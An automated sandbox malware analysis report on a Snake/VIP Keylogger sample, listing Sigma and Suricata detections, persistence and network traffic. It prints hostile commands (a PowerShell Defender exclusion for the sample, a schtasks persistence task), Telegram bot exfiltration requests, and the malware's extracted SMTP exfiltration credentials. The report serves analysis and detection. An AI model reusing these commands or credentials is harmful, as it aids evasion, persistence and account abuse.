Author: frack113: Data: DestinationIp: 50.116.88.120, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\VSVy.exe, Initiated: true, ProcessId: 6208, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49812

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJfOOh" /XML "C:\Users\user\AppData\Local\Temp\tmp337E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJfOOh" /XML "C:\Users\user\AppData\Local\Temp\tmp337E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\VSVy.exe", ParentImage: C:\Users\user\Desktop\VSVy.exe, ParentProcessId: 764, ParentProcessName: VSVy.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJfOOh" /XML "C:\Users\user\AppData\Local\Temp\tmp337E.tmp", ProcessId: 6768, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VSVy.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VSVy.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VSVy.exe", ParentImage: C:\Users\user\Desktop\VSVy.exe, ParentProcessId: 764, ParentProcessName: VSVy.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VSVy.exe", ProcessId: 3560, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJfOOh" /XML "C:\Users\user\AppData\Local\Temp\tmp337E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJfOOh" /XML "C:\Users\user\AppData\Local\Temp\tmp337E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\VSVy.exe", ParentImage: C:\Users\user\Desktop\VSVy.exe, ParentProcessId: 764, ParentProcessName: VSVy.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJfOOh" /XML "C:\Users\user\AppData\Local\Temp\tmp337E.tmp", ProcessId: 6768, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE Snake Keylogger Exfil via SMTP (VIP Recovery)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T03:36:30.645415+0100	2060048	1	Malware Command and Control Activity Detected	192.168.2.5	49812	50.116.88.120	587	TCP
2025-02-19T03:36:30.645415+0100	2060048	1	Malware Command and Control Activity Detected	192.168.2.5	49950	50.116.88.120	587	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T03:36:56.000295+0100	2803305	3	Unknown Traffic	192.168.2.5	49733	104.21.112.1	443	TCP
2025-02-19T03:36:56.773776+0100	2803305	3	Unknown Traffic	192.168.2.5	49739	104.21.112.1	443	TCP
2025-02-19T03:36:57.553743+0100	2803305	3	Unknown Traffic	192.168.2.5	49745	104.21.112.1	443	TCP
2025-02-19T03:36:58.334745+0100	2803305	3	Unknown Traffic	192.168.2.5	49751	104.21.112.1	443	TCP
2025-02-19T03:36:59.108371+0100	2803305	3	Unknown Traffic	192.168.2.5	49757	104.21.112.1	443	TCP
2025-02-19T03:36:59.931140+0100	2803305	3	Unknown Traffic	192.168.2.5	49763	104.21.112.1	443	TCP
2025-02-19T03:37:00.726883+0100	2803305	3	Unknown Traffic	192.168.2.5	49769	104.21.112.1	443	TCP
2025-02-19T03:37:01.509148+0100	2803305	3	Unknown Traffic	192.168.2.5	49775	104.21.112.1	443	TCP
2025-02-19T03:37:15.011279+0100	2803305	3	Unknown Traffic	192.168.2.5	49859	104.21.112.1	443	TCP
2025-02-19T03:37:15.886794+0100	2803305	3	Unknown Traffic	192.168.2.5	49865	104.21.112.1	443	TCP
2025-02-19T03:37:16.662879+0100	2803305	3	Unknown Traffic	192.168.2.5	49871	104.21.112.1	443	TCP
2025-02-19T03:37:17.420546+0100	2803305	3	Unknown Traffic	192.168.2.5	49877	104.21.112.1	443	TCP
2025-02-19T03:37:18.380991+0100	2803305	3	Unknown Traffic	192.168.2.5	49883	104.21.112.1	443	TCP
2025-02-19T03:37:19.245941+0100	2803305	3	Unknown Traffic	192.168.2.5	49890	104.21.112.1	443	TCP
2025-02-19T03:37:20.104668+0100	2803305	3	Unknown Traffic	192.168.2.5	49898	104.21.112.1	443	TCP
2025-02-19T03:37:20.890304+0100	2803305	3	Unknown Traffic	192.168.2.5	49904	104.21.112.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T03:36:54.457794+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49720	158.101.44.242	80	TCP
2025-02-19T03:36:55.411007+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49720	158.101.44.242	80	TCP
2025-02-19T03:36:56.207810+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49720	158.101.44.242	80	TCP
2025-02-19T03:36:56.989050+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49720	158.101.44.242	80	TCP
2025-02-19T03:36:57.770303+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49720	158.101.44.242	80	TCP
2025-02-19T03:36:58.551578+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49720	158.101.44.242	80	TCP
2025-02-19T03:36:59.317156+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49720	158.101.44.242	80	TCP
2025-02-19T03:37:00.145291+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49720	158.101.44.242	80	TCP
2025-02-19T03:37:00.942182+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49720	158.101.44.242	80	TCP
2025-02-19T03:37:13.473566+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49845	158.101.44.242	80	TCP
2025-02-19T03:37:14.426556+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49845	158.101.44.242	80	TCP
2025-02-19T03:37:15.285938+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49845	158.101.44.242	80	TCP
2025-02-19T03:37:16.098413+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49845	158.101.44.242	80	TCP
2025-02-19T03:37:16.879815+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49845	158.101.44.242	80	TCP
2025-02-19T03:37:17.629782+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49845	158.101.44.242	80	TCP
2025-02-19T03:37:18.645295+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49845	158.101.44.242	80	TCP
2025-02-19T03:37:19.504658+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49845	158.101.44.242	80	TCP
2025-02-19T03:37:20.317149+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49845	158.101.44.242	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T03:37:02.422963+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49780	149.154.167.220	443	TCP
2025-02-19T03:37:21.767796+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49908	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0000000A.00000002.3902406589.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "contact@gemssystems.com", "Password": "Admin174C@GEMS_DRFgemsSA", "Host": "mail.gemssystems.com", "Port": "587"}
Source: 0000000A.00000002.3902406589.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "contact@gemssystems.com", "Password": "Admin174C@GEMS_DRFgemsSA", "Host": "mail.gemssystems.com", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\gJfOOh.exe

ReversingLabs: Detection: 32%

Multi AV Scanner detection for submitted file

Source: VSVy.exe	ReversingLabs: Detection: 32%
Source: VSVy.exe	Virustotal: Detection: 36%			Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 0.2.VSVy.exe.447b420.6.raw.unpack	String decryptor: contact@gemssystems.com
Source: 0.2.VSVy.exe.447b420.6.raw.unpack	String decryptor: Admin174C@GEMS_DRFgemsSA
Source: 0.2.VSVy.exe.447b420.6.raw.unpack	String decryptor: mail.gemssystems.com
Source: 0.2.VSVy.exe.447b420.6.raw.unpack	String decryptor: fresh.italian@yandex.com
Source: 0.2.VSVy.exe.447b420.6.raw.unpack	String decryptor: 587
Source: 0.2.VSVy.exe.447b420.6.raw.unpack	String decryptor:
Source: 0.2.VSVy.exe.447b420.6.raw.unpack	String decryptor: contact@gemssystems.com
Source: 0.2.VSVy.exe.447b420.6.raw.unpack	String decryptor: Admin174C@GEMS_DRFgemsSA
Source: 0.2.VSVy.exe.447b420.6.raw.unpack	String decryptor: mail.gemssystems.com
Source: 0.2.VSVy.exe.447b420.6.raw.unpack	String decryptor: fresh.italian@yandex.com
Source: 0.2.VSVy.exe.447b420.6.raw.unpack	String decryptor: 587
Source: 0.2.VSVy.exe.447b420.6.raw.unpack	String decryptor:
Source: 0.2.VSVy.exe.447b420.6.raw.unpack	String decryptor: contact@gemssystems.com
Source: 0.2.VSVy.exe.447b420.6.raw.unpack	String decryptor: Admin174C@GEMS_DRFgemsSA
Source: 0.2.VSVy.exe.447b420.6.raw.unpack	String decryptor: mail.gemssystems.com
Source: 0.2.VSVy.exe.447b420.6.raw.unpack	String decryptor: fresh.italian@yandex.com
Source: 0.2.VSVy.exe.447b420.6.raw.unpack	String decryptor: 587
Source: 0.2.VSVy.exe.447b420.6.raw.unpack	String decryptor:

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\VSVy.exe

Unpacked PE file: 0.2.VSVy.exe.4a0000.0.unpack

Source: VSVy.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49727 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49852 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49908 version: TLS 1.2

Source: VSVy.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\VSVy.exe	Code function: 4x nop then jmp 09777EB9h	0_2_09777BC7
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 4x nop then jmp 012CF45Dh	10_2_012CF2C0
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 4x nop then jmp 012CF45Dh	10_2_012CF4AC
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 4x nop then jmp 012CFC19h	10_2_012CF961
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 4x nop then jmp 04FE72C3h	11_2_04FE6FD1
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 4x nop then jmp 02D9F45Dh	16_2_02D9F2C0
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 4x nop then jmp 02D9F45Dh	16_2_02D9F4AC
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 4x nop then jmp 02D9FC19h	16_2_02D9F961

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2060048 - Severity 1 - ET MALWARE Snake Keylogger Exfil via SMTP (VIP Recovery) : 192.168.2.5:49812 -> 50.116.88.120:587
Source: Network traffic	Suricata IDS: 2060048 - Severity 1 - ET MALWARE Snake Keylogger Exfil via SMTP (VIP Recovery) : 192.168.2.5:49950 -> 50.116.88.120:587
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49780 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49908 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

TCP traffic: 192.168.2.5:49812 -> 50.116.88.120:587

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2018/02/2025%20/%2021:37:00%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2018/02/2025%20/%2021:37:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Source: Joe Sandbox View

ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49845 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49720 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49745 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49763 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49751 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49739 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49733 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49769 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49898 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49871 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49877 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49775 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49757 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49859 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49904 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49890 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49865 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49883 -> 104.21.112.1:443

Source: global traffic

TCP traffic: 192.168.2.5:49812 -> 50.116.88.120:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49727 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49852 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2018/02/2025%20/%2021:37:00%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2018/02/2025%20/%2021:37:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
